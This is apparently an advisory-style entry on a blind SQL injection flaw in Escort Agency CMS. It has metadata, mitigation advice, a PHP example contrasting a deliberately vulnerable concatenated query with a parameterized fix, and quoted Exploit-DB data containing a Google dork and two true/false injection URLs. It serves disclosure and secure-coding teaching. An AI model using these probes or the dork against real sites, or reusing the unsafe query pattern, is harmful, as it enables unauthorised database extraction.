vendor: Escort Agency CMS
by: NoNameMT
CVSS: 8.8 HIGH
Blind SQL Injection
CWE: 89
Product Name: Escort Agency CMS
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7
2011

Escort Agency CMS Blind SQL Injection Vulnerability

The vulnerability exists in Escort Agency CMS, a web application developed by Escort Website Design. Input taken from the request URL reaches a SQL query without being neutralized, so an attacker can inject SQL conditions into the query and use them to extract sensitive information from the database. Exploitation requires only a crafted HTTP request. Because the injection is blind, the query results are not shown directly; the attacker infers them from how the response differs when the injected condition is true and when it is false, as the two proof-of-concept requests in the raw data illustrate.

Mitigation:

The application should use parameterized queries, so that request input is always bound as data and never concatenated into the SQL text. Additionally, a web application firewall can be placed in front of the application to detect and block malicious requests.
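
The parameterized-query fix, as an added example that is not code from Escort Agency CMS or from the advisory author. The table and column names, both function names and the in-memory SQLite database (requires the pdo_sqlite extension) are assumptions; the three inputs are constructed from the `<name>,<id>` URL form shown in the raw data, with `+` decoded to a space.

```php
<?php
declare(strict_types=1);

// Constructed in-memory database standing in for the CMS's profile table (assumed schema).
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE profiles (id INTEGER PRIMARY KEY, name TEXT)');
$pdo->exec("INSERT INTO profiles (id, name) VALUES (509, 'Alexa')");

// Vulnerable pattern (hypothetical): the id from the URL segment is concatenated
// into the SQL text, so a trailing boolean condition changes the query's logic.
function findProfileUnsafe(PDO $pdo, string $segment): ?array
{
    [, $id] = array_pad(explode(',', $segment, 2), 2, '');
    $row = $pdo->query("SELECT id, name FROM profiles WHERE id = $id")->fetch(PDO::FETCH_ASSOC);
    return $row ?: null;
}

// Hardened form (hypothetical): strict format check, then a bound integer parameter.
function findProfile(PDO $pdo, string $segment): ?array
{
    // Accept only <name>,<digits>; anything else is treated as "not found".
    if (!preg_match('/\A[^,]+,(\d{1,9})\z/', $segment, $m)) {
        return null;
    }
    $stmt = $pdo->prepare('SELECT id, name FROM profiles WHERE id = :id');
    $stmt->bindValue(':id', (int) $m[1], PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row ?: null;
}

// Constructed inputs: a normal segment, then the true and false conditions.
$segments = ['Alexa,509', 'Alexa,509 and 1=1-- ', 'Alexa,509 and 1=0-- '];
foreach ($segments as $segment) {
    printf(
        "%-22s unsafe=%-5s safe=%s\n",
        $segment,
        findProfileUnsafe($pdo, $segment) ? 'found' : 'none',
        findProfile($pdo, $segment) ? 'found' : 'none'
    );
}
```

The unsafe handler answers differently for the true and the false condition, which is the signal a blind injection depends on; the hardened handler gives the same answer for both.
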
Source

Exploit-DB raw data:

# Exploit Title: Escort Agency CMS Blind SQL Injection Vulnerability
# Google Dork: "Powered by Escort agency CMS - Escort agency webdesign"
# Platform: php, webapp
# Date: 10.02.2011
# Author: NoNameMT
# Software Link: http://www.escortwebsitedesign.co.uk/escort-agency-cms/index.php
# Price: 299 £ per month
# Tested on: Windows 7
# Mail: nonamemt@gmail.com
# Homepage: http://nonamemt.us

# Exploit:
http://localhost/agency5/Alexa,509+and+1=1--+ //True
http://localhost/agency5/Alexa,509+and+1=0--+ //False

# Greetings:
4004-security-project.com, J0hn.X3r, TamCore, bursali, theeddy42,
Nightmare_FH